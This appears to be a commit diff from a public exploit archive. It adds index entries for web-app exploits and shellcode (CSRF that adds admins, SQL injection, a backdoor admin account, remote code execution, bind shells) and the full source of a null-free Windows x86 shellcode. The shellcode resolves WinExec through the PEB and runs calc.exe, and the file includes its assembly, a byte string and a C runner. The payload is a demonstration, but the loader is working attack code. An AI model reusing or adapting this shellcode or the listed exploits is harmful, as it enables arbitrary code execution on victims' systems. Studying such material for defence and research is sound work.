48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php, 48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php,
48105,exploits/hardware/webapps/48105.txt,"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting",2020-02-24,"Scott Goodwin",webapps,hardware,
48107,exploits/hardware/webapps/48107.pl,"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,
48109,exploits/php/webapps/48109.txt,"AMSS++ v 4.31 - 'id' SQL Injection",2020-02-24,indoushka,webapps,php,
48110,exploits/hardware/webapps/48110.txt,"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
48113,exploits/php/webapps/48113.txt,"CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)",2020-02-24,J3rryBl4nks,webapps,php,
48114,exploits/php/webapps/48114.txt,"AMSS++ 4.7 - Backdoor Admin Account",2020-02-24,indoushka,webapps,php,
48115,exploits/hardware/webapps/48115.pl,"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
48117,exploits/php/webapps/48117.txt,"ATutor 2.2.4 - 'id' SQL Injection",2020-02-24,"Andrey Stoykov",webapps,php,
48118,exploits/hardware/webapps/48118.txt,"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
48119,exploits/java/webapps/48119.txt,"ManageEngine EventLog Analyzer 10.0 - Information Disclosure",2020-02-24,"Scott Goodwin",webapps,java,
48122,exploits/php/webapps/48122.txt,"eLection 2.0 - 'id' SQL Injection",2020-02-24,J3rryBl4nks,webapps,php,
48124,exploits/aspx/webapps/48124.txt,"DotNetNuke 9.5 - Persistent Cross-Site Scripting",2020-02-24,"Sajjad Pourali",webapps,aspx,
48125,exploits/aspx/webapps/48125.txt,"DotNetNuke 9.5 - File Upload Restrictions Bypass",2020-02-24,"Sajjad Pourali",webapps,aspx,
48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1015,3 +1015,4 @@ id,file,description,date,author,type,platform
47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86

1 id file description date author type platform
1015 47953 shellcodes/windows/47953.c Windows/7 - Screen Lock Shellcode (9 bytes) 2020-01-22 Saswat Nayak shellcode windows
1016 47980 shellcodes/windows/47980.txt Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) 2020-01-30 boku shellcode windows
1017 48032 shellcodes/linux/48032.py Linux/x86 - Bind Shell Generator Shellcode (114 bytes) 2020-02-10 boku shellcode linux
1018 48116 shellcodes/windows_x86/48116.c Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) 2020-02-24 boku shellcode windows_x86

147
shellcodes/windows_x86/48116.c Normal file
View file

@ -0,0 +1,147 @@
# Title: Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
# Shellcode Author: Bobby Cooke
# Date: 2020-02-21
# Technique: PEB & Export Directory Table
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
_start:
; Create a new stack frame
mov ebp, esp ; Set base stack pointer for new stack-frame
sub esp, 0x20 ; Decrement the stack by 32 bytes
; Find kernel32.dll base address
xor ebx, ebx ; EBX = 0x00000000
mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB
mov ebx, [ebx+0xC] ; EBX = Address_of_LDR
mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll
mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll
; Find the address of the WinExec Symbol within kernel32.dll
; + The hex values will change with different versions of Windows
; Find the address of the Export Table within kernel32.dll
mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader = 0xF8
add ebx, eax ; EBX = &NewEXEHeader = 0xF8 + &kernel32.dll
mov ebx, [ebx+0x78] ; EBX = RVA ExportTable = 0x777B0 = [&NewExeHeader + 0x78]
add ebx, eax ; EBX = &ExportTable = RVA ExportTable + &kernel32.dll
; Find the address of the Name Pointer Table within kernel32.dll
; + Contains pointers to strings of function names - 4-byte/dword entries
mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable = 0x790E0
add edi, eax ; EDI = &NamePointerTable = 0x790E0 + &kernel32.dll
mov [ebp-0x8], edi ; save &NamePointerTable to stack frame
; Find the address of the Ordinal Table
; - 2-byte/word entries
mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable = 0x7A9E8
add ecx, eax ; ECX = &OrdinalTable = 0x7A9E8 + &kernel32.dll
mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame
; Find the address of the Address Table
mov edx, [ebx+0x1C] ; EDX = RVA AddressTable = 0x777CC
add edx, eax ; EDX = &AddressTable = 0x777CC + &kernel32.dll
mov [ebp-0x10], edx ; save &AddressTable to stack-frame
; Find Number of Functions within the Export Table of kernel32.dll
mov edx, [ebx+0x14] ; EDX = Number of Functions = 0x642
mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame
jmp short functions
findFunctionAddr:
; Initialize the Counter to prevent infinite loop
xor eax, eax ; EAX = Counter = 0
mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame
; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
searchLoop:
mov edi, [ebp-0x8] ; EDI = &NamePointerTable
mov esi, [ebp+0x18] ; ESI = Address of String for the Symbol we are searching for
xor ecx, ecx ; ECX = 0x00000000
cld ; clear direction flag - Process strings from left to right
mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll
add cx, 0x8 ; ECX = len("WinExec,0x00") = 8 = 7 char + 1 Null
repe cmpsb ; compare first 8 bytes of [&NameString] to "WinExec,0x00"
jz found ; If string at [&NameString] == "WinExec,0x00", then end loop
inc eax ; else Counter ++
cmp eax, edx ; Does EAX == Number of Functions?
jb searchLoop ; If EAX != Number of Functions, then restart the loop
found:
; Find the address of WinExec by using the last value of the Counter
mov ecx, [ebp-0xC] ; ECX = &OrdinalTable
mov edx, [ebp-0x10] ; EDX = &AddressTable
mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)]
mov eax, [edx + eax*4] ; EAX = RVA WinExec = [&AddressTable + ordinalNumber]
add eax, [ebp-0x4] ; EAX = &WinExec = RVA WinExec + &kernel32.dll
ret
functions:
; Create string 'WinExec\x00' on the stack and save its address to the stack-frame
mov edx, 0x63657878 ; "cexx"
shr edx, 8 ; Shifts edx register to the right 8 bits
push edx ; "\x00,cex"
push 0x456E6957 ; EniW : 456E6957
mov [ebp+0x18], esp ; save address of string 'WinExec\x00' to the stack-frame
call findFunctionAddr ; After Return EAX will = &WinExec
; Call WinExec( CmdLine, ShowState );
; CmdLine = "calc.exe"
; ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
xor ecx, ecx ; clear eax register
push ecx ; string terminator 0x00 for "calc.exe" string
push 0x6578652e ; exe. : 6578652e
push 0x636c6163 ; clac : 636c6163
mov ebx, esp ; save pointer to "calc.exe" string in eax
inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001
push ecx ; uCmdShow - push 0x1 to stack # 2nd argument
push ebx ; lpcmdLine - push string address stack # 1st argument
call eax ; Call the WinExec Function
; Create string 'ExitProcess\x00' on the stack and save its address to the stack-frame
xor ecx, ecx ; clear eax register
mov ecx, 0x73736501 ; 73736501 = "sse",0x01 // "ExitProcess",0x0000 string
shr ecx, 8 ; ecx = "ess",0x00 // shr shifts the register right 8 bits
push ecx ; sse : 00737365
push 0x636F7250 ; corP : 636F7250
push 0x74697845 ; tixE : 74697845
mov [ebp+0x18], esp ; save address of string 'ExitProcess\x00' to stack-frame
call findFunctionAddr ; After Return EAX will = &ExitProcess
; Call ExitProcess(ExitCode)
xor edx, edx
push edx ; ExitCode = 0
call eax ; ExitProcess(ExitCode)
; nasm -f win32 win32-WinExec_Calc-Exit.asm -o win32-WinExec_Calc-Exit.o
; for i in $(objdump -D win32-WinExec_Calc-Exit.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
#####################################################################################
#include <windows.h>
#include <stdio.h>
char code[] = \
"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0";
int main(int argc, char **argv)
{
int (*func)();
func = (int(*)()) code;
(int)(*func)();
}